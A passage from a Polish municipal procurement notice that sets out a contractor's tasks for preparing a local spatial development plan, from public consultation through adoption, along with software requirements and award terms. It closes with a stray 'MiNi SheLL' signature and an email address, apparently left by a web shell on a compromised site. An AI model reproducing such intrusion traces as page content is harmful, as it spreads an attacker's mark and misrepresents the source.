b)	wprowadzenie odpowiednio do projektu planu i prognozy oddziaływania na środowisko uwzględnionych przez Zamawiającego korekt, wynikających z uzyskanych opinii i dokonanych uzgodnień organów.  
c)	przekazanie Zamawiającemu materiałów w 1 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, o których mowa w części V lit. a) i lit. b).  
6) Część VI - wyłożenie i dyskusja publiczna oraz sposób realizacji infrastruktury  technicznej:
a)	uczestniczenie w dyżurze autorskim i dyskusji publicznej w czasie wyłożenia do publicznego wglądu  projektu planu wraz z prognozą oddziaływania na środowisko,
b)	opracowanie analizy uwag wniesionych do projektu planu wraz z propozycją ich  uwzględnienia oraz uzasadnieniem nieuwzględnienia pozostałych  z wyodrębnieniem na wniesione  na podstawie ustawy o planowaniu i zagospodarowaniu oraz ustawy 
o udostępnianiu informacji o środowisku () w 1egz. oraz w 1 egz. w formie numerycznej ,                                                         
c)  wprowadzenie do projektu planu korekt wynikających z rozpatrzenia uwag, zaakceptowanych przez Zamawiającego,                            
d)  przekazanie skorygowanego projektu planu Zamawiającemu w 1 egz. oraz  w 1 egz. 
w formie publikacji elektronicznej na płycie CD,
e)  wprowadzenie do projektu planu korekt wynikających z ponawianych czynności w związku z uwzględnieniem uwag i  przekazywanie  materiałów Zamawiającemu. 
f) opracowanie sposobów realizacji zapisanych w  planie, inwestycji z zakresu  infrastruktury technicznej, które należą do zadań własnych gminy oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych - 1 egz. oraz w 1 egz.  w formie numerycznej, 
7) Część VII - uchwalenie:
a)	przedstawienie projektu planu miejscowego na posiedzeniu Komisji Gospodarki Przestrzennej i Ochrony Środowiska oraz na Sesji Rady Miasta do uchwalenia wraz 
z załącznikami, 
b)	przekazanie skorygowanego projektu planu Zamawiającemu w 5 egz. oraz w 1 egz. w formie publikacji elektronicznej na płycie CD, łącznie z listą nieuwzględnionych uwag oraz określeniem sposobu realizacji, zapisanych w  planie  inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych miasta, oraz zasad ich finansowania, zgodnie z przepisami o finansach publicznych.
c)	opracowanie pisemnego podsumowania i uzasadnienia, o których mowa w art. 42 pkt 2) i  art. 55 ust. 3 ustawy o udostępnianiu informacji o środowisku (),                          
d)	ewentualne wprowadzenie zmian do projektu planu wniesionych przez Radę Miasta 
i udział w czynnościach ponowionej, w niezbędnym zakresie, procedury planistycznej,
e)	udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały 
w  sprawie  planu, w tym udział w postępowaniu przed sądami administracyjnymi,
f)	udzielanie ewentualnych wyjaśnień Wojewodzie, któremu została przedstawiona  uchwała o uchwaleniu planu miejscowego wraz z załącznikami, do ich oceny pod względem zgodności  z przepisami prawa,
g)	przygotowanie uchwały w formacie Edytora Aktów Prawnych  XML do publikacji 
w Dzienniku Urzędowym Województwa Mazowieckiego,
h)	przygotowanie części opisowej planu w oprogramowaniu WINPLAN firmy GEOBID z Katowic (co  najmniej wersja 8,00).

Przy realizacji zamówienia na sporządzenie miejscowego planu zagospodarowania przestrzennego konieczne jest zastosowania co  najmniej wersji 8,0 oprogramowania WINPLAN i EWMAPA firmy Geobid z Katowic  oraz edytora tekstu co najmniej Word 2000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com